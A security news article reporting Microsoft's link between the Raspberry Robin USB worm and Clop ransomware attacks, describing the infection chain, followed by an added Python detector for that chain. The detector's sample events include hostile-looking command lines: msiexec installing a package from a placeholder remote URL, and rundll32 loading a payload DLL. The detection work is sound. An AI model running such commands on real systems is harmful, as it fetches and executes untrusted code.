Microsoft links Raspberry Robin worm to Clop ransomware attacks



Microsoft has discovered recent activity that links the Raspberry Robin worm to human-operated ransomware attacks. 

The experts noticed that threat actors tracked as DEV-0950 used Clop ransomware to encrypt the network of organizations previously infected with the worm.

Raspberry Robin is a worm that spreads over an external drive. After initial infection, it downloads its payload through msiexec.exe from QNAP cloud accounts, executes its code through rundll32.exe, and establishes a command and control (C2) channel through TOR connections.

The DEV-0950 attacks led to the deployment of the Cobalt Strike beacon. In some cases, the attackers delivered the Truebot malware between the Raspberry Robin infection and the Cobalt Strike deployment.

DEV-0206 is an access broker tracked by Microsoft, which uses malvertising campaigns to compromise networks worldwide.

Reference: Microsoft

However, Microsoft researchers say: “DEV-0950 traditionally uses phishing to acquire the majority of their victims, so this notable shift to using Raspberry Robin enables them to deliver payloads to existing infections and move their campaigns more quickly to ransomware stages.”

The Raspberry Robin malware was first spotted in September 2021, when the experts observed it targeting organizations in the technology and manufacturing industries. Initial access is typically through infected removable drives, often USB devices.

The malware uses cmd.exe to read and execute a file stored on the infected external drive. It then leverages msiexec.exe for external network communication to a rogue domain used as C2, downloading and installing a DLL library file.
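As an added example (not from the original article or from Microsoft), the following small detector runs over constructed Sysmon-style process-creation events and flags the three behaviours of the chain described above: cmd.exe executing a file from a removable drive, msiexec.exe installing a package fetched from a remote URL, and rundll32.exe spawned directly by msiexec.exe. The ProcEvent fields, the removable drive-letter list, and every sample path, host and command line are assumptions chosen for illustration.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent_image: str  # full path of the parent process (assumed field)
    image: str         # full path of the created process (assumed field)
    cmdline: str       # full command line (assumed field)

URL_RE = re.compile(r"https?://", re.IGNORECASE)
DRIVE_RE = re.compile(r"\b([A-Z]):\\", re.IGNORECASE)

def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def detect(events, removable_drives):
    """Return (rule_name, event) pairs for events matching the worm's chain."""
    drives = {d[0].upper() for d in removable_drives}
    hits = []
    for ev in events:
        img, parent = _basename(ev.image), _basename(ev.parent_image)
        if img == "cmd.exe":
            # cmd.exe reading/executing a file that lives on a removable drive
            letters = {m.upper() for m in DRIVE_RE.findall(ev.cmdline)}
            if letters & drives:
                hits.append(("cmd_executes_from_removable_drive", ev))
        elif img == "msiexec.exe" and URL_RE.search(ev.cmdline):
            # msiexec.exe pulling its package from a remote URL rather than a local file
            hits.append(("msiexec_remote_package", ev))
        elif img == "rundll32.exe" and parent == "msiexec.exe":
            # DLL execution chained directly off the installer
            hits.append(("rundll32_spawned_by_msiexec", ev))
    return hits

# Constructed sample events (not real telemetry); hosts and paths are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c D:\usb_launcher.cmd"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /q /i http://placeholder.invalid/package.msi"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\ProgramData\payload.dll,Entry"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Installers\app.msi /qn"),   # benign local install
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c dir C:\Users"),                      # benign, fixed drive
]

if __name__ == "__main__":
    for rule, ev in detect(SAMPLE_EVENTS, ["D:"]):
        print(rule, "->", ev.cmdline)
```

Which drive letters count as removable must come from the host's own volume inventory; the list passed here stands in for that lookup.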

Microsoft Defender has provided a few mitigations to reduce the impact of the threat.

Indicators of compromise (IOCs)




About the Author:

FirstHackersNews- Identifies Security

